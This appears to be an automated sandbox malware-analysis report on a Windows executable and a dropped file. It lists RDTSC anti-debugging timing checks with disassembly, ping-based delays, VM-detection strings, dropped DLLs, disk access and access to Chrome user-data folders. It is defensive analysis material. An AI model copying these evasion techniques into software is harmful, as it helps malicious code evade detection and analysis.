Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F000D second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE34h 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0275 second address: 00000000004F027B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB07 second address: 00000000004EFB20 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ah 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB26 second address: 00000000004EFB4B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C683h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 004EFE72h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB51 second address: 00000000004EFB74 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C685h 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB7A second address: 00000000004EFB9B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBA1 second address: 00000000004EFBC1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 004F06A6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBC7 second address: 00000000004EFBEA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C681h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 004EFED6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBF0 second address: 00000000004EFEDD instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFEE3 second address: 00000000004EFF03 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF09 second address: 00000000004EFF31 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C684h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF37 second address: 00000000004EFF56 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF5C second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C38C729h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0034 second address: 00000000004F0062 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C685h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F108C38C889h 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0068 second address: 00000000004F0085 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F008B second address: 00000000004F00A5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00AB second address: 00000000004F00C7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00CD second address: 00000000004F00EF instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00F5 second address: 00000000004F0116 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C680h 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F011C second address: 00000000004F0142 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C686h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0148 second address: 00000000004F0167 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F016D second address: 00000000004F0188 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F018E second address: 00000000004F01B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C686h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F01B9 second address: 00000000004F01DA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C681h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F01E0 second address: 00000000004F0203 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C683h 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0209 second address: 00000000004F0226 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F022C second address: 00000000004EFF9F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C38C3C8h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFA5 second address: 00000000004EFFC3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFC9 second address: 00000000004EFFE5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFEB second address: 00000000004F0007 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F000D second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C684h 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc

Uses ping.exe to sleep

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_004EFAF0 rdtsc

0_2_004EFAF0

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: _memset,GetAdaptersInfo,_memset,_sprintf,CryptAcquireContextW,CryptCreateHash,CryptHashData,_memset,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,_sprintf,CryptDestroyHash,CryptReleaseContext,

0_2_00463680

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

2_2_10019780

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_100204C0

2_2_100204C0

Source: C:\Users\user\Desktop\N1yprTBBXs.exe TID: 6576	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe TID: 6928	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe TID: 6992	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00410120 _memset,PathCombineW,_memset,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,FindClose,	0_2_00410120
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00413360 _memset,_memset,PathCombineW,FindFirstFileW,_memset,PathCombineW,DeleteFileW,GetLastError,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,MoveFileExW,	0_2_00413360
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1001A170 FindFirstFileA,FindClose,	2_2_1001A170

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\	Jump to behavior

Source: 6272167835D47591.exe, 00000002.00000003.284319161.0000000004159000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000004.00000003.266530932.0000000002E21000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000004.00000002.279544410.0000000002B39000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}q
Source: 6272167835D47591.exe, 00000002.00000003.284588878.000000000415F000.00000004.00000001.sdmp	Binary or memory string: WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000002.00000003.287653731.0000000004131000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: 6272167835D47591.exe, 00000002.00000003.263131857.0000000002EA1000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}&>3
Source: 6272167835D47591.exe, 00000002.00000003.284319161.0000000004159000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.266653982.0000000002B34000.00000004.00000040.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: ecv37E8.tmp.9.dr	Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20210130T013815Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=3a4d640dea36471a8ac5b7161018101b&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=838503&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=838503&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 6272167835D47591.exe, 00000004.00000002.274005662.000000000019B000.00000004.00000010.sdmp	Binary or memory string: VMware Virtual disk 2.0
